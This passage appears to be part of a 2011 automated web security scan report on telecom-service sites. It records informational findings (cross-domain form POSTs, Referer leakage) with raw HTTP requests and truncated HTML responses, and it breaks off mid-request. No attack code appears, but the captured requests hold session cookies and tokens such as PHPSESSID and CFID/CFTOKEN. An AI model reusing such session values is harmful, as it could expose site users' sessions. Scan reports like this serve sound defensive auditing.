<div id="connect_widget_4e6615e69ecac3f34230641" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">37,477</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

13.10. http://www.whitefence.com/category/high-speed-internet/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/high-speed-internet/

Request 1

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/television-service/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:32 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.whitefence.com/category/television-service/" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="highSpeedInternetAccess" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare Cable and DSL High-Speed Internet</h1>
<p>
When it comes to finding the best ways to save money on broadband Internet, we have you covered. WhiteFence gives you the opportunity to compare <strong>high-speed Internet providers</strong> and find a number of great prices and plans, including DSL, cable and satellite Internet. </p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/fios.70x70.png" alt="FiOS" width="70" heigh
...[SNIP]...

Request 2

GET /category/high-speed-internet/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D; _vis_opt_test_cookie=1

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:17 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 31485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="highSpeedInternetAccess" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare Cable and DSL High-Speed Internet</h1>
<p>
When it comes to finding the best ways to save money on broadband Internet, we have you covered. WhiteFence gives you the opportunity to compare <strong>high-speed Internet providers</strong> and find a number of great prices and plans, including DSL, cable and satellite Internet. </p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/high-speed-internet/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/fios.70x70.png" alt="FiOS" width="70" height="70" /><span class="company name">FiOS</span>
       </a>
...[SNIP]...

13.11. http://www.whitefence.com/category/home-phone/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/home-phone/

Request 1

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:54 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29323

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="localPhone" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Shop and Save on Home Phone Service Today</h1>
<p>
There's no need to pass on that home phone line just yet. Select from a number of great local phone service options for your home today. Find and compare low rates from each of
the leading <strong>home phone companies</strong> in your area.
</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/comcast/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/comcast.70x70.png" alt="Comcast" width="70" height="70" /><span class="company name">Comcast</span>
       </a>
   </li>
   <li>
       <a href="company/xfinity/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/xfinity.70x70.png" alt="Xfinity" width="70" height="70" /><span class="company name">Xfinity</span
...[SNIP]...

Request 2

GET /category/home-phone/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:52:11 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29250

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="localPhone" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Shop and Save on Home Phone Service Today</h1>
<p>
There's no need to pass on that home phone line just yet. Select from a number of great local phone service options for your home today. Find and compare low rates from each of
the leading <strong>home phone companies</strong> in your area.
</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/comcast/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/comcast.70x70.png" alt="Comcast" width="70" height="70" /><span class="company name">Comcast</span>
       </a>
   </li>
   <li>
       <a href="company/xfinity/category/home-phone/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/xfinity.70x70.png" alt="Xfinity" width="70" height="70" /><span class="company name">Xfinity</span>
       </a>
   </li>
   <li>
       <a href="company/qwest/category/home-phone/">
           
...[SNIP]...

13.12. http://www.whitefence.com/category/television-service/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.whitefence.com
Path:   /category/television-service/

Request 1

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
Referer: http://www.whitefence.com/category/home-phone/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:59:28 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="http://www.whitefence.com/category/home-phone/" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="cableSatellite" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare and Save on Cable &amp; Satellite TV Service</h1>
<p>Ready to enter a whole new world of TV programming? Comparing TV packages from cable, satellite, FiOS or U-verse can save you money on <strong>television service</strong>! No matter what your TV preference is, you can order the perfect <a href="http://www.whitefence.com/information/cable-tv/">cable TV</a> and <a href="http://www.whitefence.com/information/satellite-tv/">satellite TV</a> plans at WhiteFence.</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/television-service/">
           <img
...[SNIP]...

Request 2

GET /category/television-service/ HTTP/1.1
Host: www.whitefence.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=7mgkb57jloi23h6h58j84sq2b4; _vis_opt_s=1%7C; _vis_opt_test_cookie=1; s_cc=true; __utma=218834399.1875876376.1315327922.1315327922.1315327922.1; __utmb=218834399.1.10.1315327922; __utmc=218834399; __utmz=218834399.1315327922.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=telephone%20service; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:00:13 GMT
Server: Apache
Vary: *
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html
Content-Length: 29196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<
...[SNIP]...
<input type="hidden" name="referrer" value="" />

<input type="hidden" name="bpID" value="1039546" />
<input type="hidden" name="eID" value="1039547" />

<input type="hidden" name="scKey" value="cableSatellite" />
<div class="privacy">privacy &amp; security <a href="/corporate/privacy" target="_blank">protected</a></div>
<button type="submit" id="SubmitGo">Go</button>
</fieldset>
</form>
</div>
<div class="description">

<h1>Compare and Save on Cable &amp; Satellite TV Service</h1>
<p>Ready to enter a whole new world of TV programming? Comparing TV packages from cable, satellite, FiOS or U-verse can save you money on <strong>television service</strong>! No matter what your TV preference is, you can order the perfect <a href="http://www.whitefence.com/information/cable-tv/">cable TV</a> and <a href="http://www.whitefence.com/information/satellite-tv/">satellite TV</a> plans at WhiteFence.</p>
</div>
<div class="company side panel">
<h2>Search By Company</h2>
<ul class="">

   <li>
       <a href="company/att/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/att.70x70.png" alt="AT&amp;T" width="70" height="70" /><span class="company name">AT&T</span>
       </a>
   </li>
   <li>
       <a href="company/uverse/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/uverse.70x70.png" alt="Uverse" width="70" height="70" /><span class="company name">Uverse</span>
       </a>
   </li>
   <li>
       <a href="company/verizon/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimages/providerlogos/originals/verizon.70x70.png" alt="Verizon" width="70" height="70" /><span class="company name">Verizon</span>
       </a>
   </li>
   <li>
       <a href="company/fios/category/television-service/">
           <img src="http://www.whitefence.com/resize/qsrimage
...[SNIP]...

14. Cross-domain POST  previous  next
There are 5 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


14.1. https://login.frontier.com/webmail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontier.com
Path:   /webmail/

Issue detail

The page contains a form which POSTs data to the domain www.frontieronline.com. The form contains the following fields:

Request

GET /webmail/ HTTP/1.1
Host: login.frontier.com
Connection: keep-alive
Referer: http://frontier.com/winwin1?mkwid=sPb9VHDZ0&pcrid=14742396110
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:30:21 GMT
Server: Apache/2.2.8 (Ubuntu) mod_python/3.3.1 Python/2.5.2
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 9630

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html lang="en-US">
<head>
<title>Mail :: Welcome to Frontier Mail</title>
<link rel="icon" href="/med
...[SNIP]...
<!-- Begin Footer -->
<form name="Form1" method="post" action="http://www.frontieronline.com/Default.aspx" id="Form1">
<table width="955" border="0" cellspacing="0" cellpadding="0" >
...[SNIP]...

14.2. http://www.aptela.com/lp2011/T2V1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The page contains a form which POSTs data to the domain ww3.vocalocity.com. The form contains the following fields:

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>

<form class="lpeRegForm formNotEmpty" method="post" enctype="application/x-www-form-urlencoded" action="http://ww3.vocalocity.com/l/7772/2011-08-18/642J" id="mktForm_1025" name="mktForm_1025">

<ul>
...[SNIP]...

14.3. http://www.aptela.com/lp2011/T2V1/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.aptela.com
Path:   /lp2011/T2V1/

Issue detail

The page contains a form which POSTs data to the domain ww3.vocalocity.com. The form contains the following fields:

Request

GET /lp2011/T2V1/?utm_source=google&utm_medium=ppc&utm_term=business_telephone_service&utm_campaign=phones_business&refcd=GO000000516757112s_business_telephone_service&tsacr=GO7010955737&_kk=e5cfc5b1-4c17-4425-8b78-9c87aae9c019&_kt=7010955737&gclid=CMqnsqPHiKsCFRM2gwodbCP53A HTTP/1.1
Host: www.aptela.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=telephone+service
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:51:59 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<!-- Google Website Optimizer Co
...[SNIP]...
</script>
<form class="lpeRegForm formNotEmpty" method="post" enctype="application/x-www-form-urlencoded" action="http://ww3.vocalocity.com/l/7772/2011-08-18/642J" id="mktForm_1026" name="mktForm_1026">
   
   <ul class="emailForm">
...[SNIP]...

14.4. http://www.frontierhelp.com/frontiernetnews.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /frontiernetnews.cfm

Issue detail

The page contains a form which POSTs data to the domain www.frontieronline.com. The form contains the following fields:

Request

GET /frontiernetnews.cfm HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://www.frontierhelp.com/techsupport.cfm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155; s_cc=true; s_sq=cznpeace%3D%2526pid%253DFrontier%252520Peace%252520of%252520Mind%252520%25253A%252520Tech%252520Support%2526pidt%253D1%2526oid%253Dhttp%25253A//www.frontierhelp.com/frontiernetnews.cfm%2526ot%253DA

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:51:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<html>


<link rel="icon" href="http://#request.cName#.frontierhelp.com/frontier.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://#request.cName#.frontierhelp.com/frontier.ic
...[SNIP]...
</style>

<form name="Form1" method="post" action="http://www.frontieronline.com/Default.aspx" id="Form1">

<table width="955" border="0" cellspacing="0" cellpadding="0">
...[SNIP]...

14.5. http://www.frontierhelp.com/techsupport.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontierhelp.com
Path:   /techsupport.cfm

Issue detail

The page contains a form which POSTs data to the domain www.frontier.com. The form contains the following fields:

Request

GET /techsupport.cfm HTTP/1.1
Host: www.frontierhelp.com
Proxy-Connection: keep-alive
Referer: http://frontier.my.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=RNLPJJS10.160.118.41T0x0000000e_0xc7da91deCMYUJ; CFID=2324395; CFTOKEN=20838155

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 06 Sep 2011 12:46:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<html>


<link rel="icon" href="http://#request.cName#.frontierhelp.com/frontier.ico" type="image/x-icon">
<link rel="shortcut icon" href="http://#request.cName#.frontierhelp.com/frontier.ic
...[SNIP]...
<tr>
                   <form name="Form1" method="post" action="http://www.frontier.com/Default.aspx" id="Form1">
                   <td>
...[SNIP]...

15. Cross-domain Referer leakage  previous  next
There are 129 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://ad.agkn.com/iframe!t=1129!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
